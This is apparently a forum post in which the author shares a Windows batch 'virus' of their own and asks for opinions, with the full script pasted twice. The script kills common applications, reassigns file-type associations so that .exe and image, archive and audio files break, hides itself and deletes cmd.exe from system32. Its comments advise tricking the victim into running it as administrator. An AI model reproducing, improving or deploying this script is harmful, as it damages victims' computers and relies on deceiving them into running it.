Here is a bat virus that i made please tell me what you think of it:
rem i take no responsibility for any damage done to one's computer!
rem the victim must run as admin so tell them its a file they should open
rem or something
rem this is for educational or testing purposes but you can use it for
rem another thing
@echo off
cls
taskkill /f /im skype.exe
taskkill /f /im cmd.exe
taskkill /f /im notepad.exe
taskkill /f /im chrome.exe
taskkill /f /im steam.exe
taskkill /f /im internetexplore.exe
taskkill /f /im calc.exe
assoc .exe=pngfile
assoc .png=exefile
assoc .jpg=exefile
assoc .xml=cssfile
assoc .zip=exefile
assoc .mp3=sysfile
assoc .wav=xmlfile
attrib +h %0
del /f /q C:\windows\system32\cmd.exe
rem i take no responsibility for any damage done to one's computer!
rem the victim must run as admin so tell them its a file they should open
rem or something
rem this is for educational or testing purposes but you can use it for
rem another thing
@echo off
cls
taskkill /f /im skype.exe
taskkill /f /im cmd.exe
taskkill /f /im notepad.exe
taskkill /f /im chrome.exe
taskkill /f /im steam.exe
taskkill /f /im internetexplore.exe
taskkill /f /im calc.exe
assoc .exe=pngfile
assoc .png=exefile
assoc .jpg=exefile
assoc .xml=cssfile
assoc .zip=exefile
assoc .mp3=sysfile
assoc .wav=xmlfile
attrib +h %0
del /f /q C:\windows\system32\cmd.exe